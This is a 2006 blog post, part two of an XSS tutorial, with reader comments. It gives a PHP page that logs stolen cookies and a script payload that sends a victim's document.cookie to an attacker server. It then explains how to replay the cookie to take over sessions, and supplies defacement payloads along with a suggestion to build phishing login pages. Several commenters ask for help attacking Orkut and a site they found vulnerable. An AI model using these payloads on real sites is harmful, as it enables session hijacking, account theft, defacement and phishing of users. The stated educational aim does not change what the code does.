Tuesday, December 19, 2006

XSS - Part 2 (Cookie stealing and Defacement)


Please note that this article is for educational purposes only, and is targeted at webmasters who have never seen this scenario. Please donot harm anyone.
Disclaimer : I am not responsible for any damages arising due to methods specified in this page. Webmasters please fix it ASAP.

In the first part we injected javascript successfully, and we got an alert. Now let us move to step 2 , defacing and cookie stealing.

Cookie Stealing using XSS
Cookie is used to manage sessions in browsers. Each person logged in gets a unique cookie, it is like a key to the site. So if you can get hold of this cookie, you have the key to enter the site. The site will welcome as the person from whom you stealed the cookie. Now let us look how to grab the cookie using cross site scripting.

For cookie stealing there must be an xss hole which can be injected through the url of the page like the one on propmart.com we discussed in first part.
Getting a cookie in javascript is accomplished by document.cookie, if somehow we could sent this to our page we have success. For this trick you will need to setup a page that logs the cookies that it recieves. The source of this page in php would be something like :
grabcookie.php


<?php
$handle=fopen("cookiejar.txt","a");
fputs($handle,"\n".$_GET["cookie"]."\n");
fclose($handle);
?>

Now to get the cookie to this page we would have to embed the following

<script>
var i=new Image();i.src = "http://myserver.com/myfolders/grabcookie.php?cookie="+document.cookie;
</script>

This code will send the cookies to your server. Now embeding the script in url can be done as discussed in part 1.

Next all you have to do is get this cookie (from cookiejar.txt) and set them in your browser. You can add and edit cookies in firefox with the cookie editor plugin.
Just a refresh will certainly get you in, if you are not too late (Cookie expires after sometime).


Defacing a website

To deface a website , the site must have a system which puts something you submit on their site (like guestbooks, feedbacks). Now if there is an XSS hole in such a page, you can embed the script to deface.

<script src="(location of script)"></script>

- OR -

<script>
document.body.innerHTML="<h1>XSS Defacing</h1>your HTML code here";
</script>

Either you can deface or craft a login page, which results in phishing.
Since it is dangerous to mention any examples, find out yourselves ...

Further reading and new XSS holes on
» ha.ckers.org

Eureka?
Let the world know ... post a comment.

6 comments:

Anonymous said...

hey how can i inject code into orkut??
recently peaple found some hole,thy r tranfering the communities of the victim...
mailme somethin yu no to
redhidus@yahoo.com

Anonymous said...

What i need all ?
a host for grabcookie.php and a like like this:

and the script

thats all ?

email: pekel_3@hotmail.com

Anonymous said...

but u dont tell about the use of the worm script we dont know how to inject it in xss as well how the php page uses this script,

Arun Prabhakar said...

the javascript sends the cookie to the php page which logs it..
simple...

Anonymous said...

i got a website which is vulnerable, which gives out XSS alert,i'v created php ,but how to insert our script?

Anonymous said...

Thank you for the explanations. It's useful to understand better what is going on.
(no, I do not intend to deface. But to protect. :)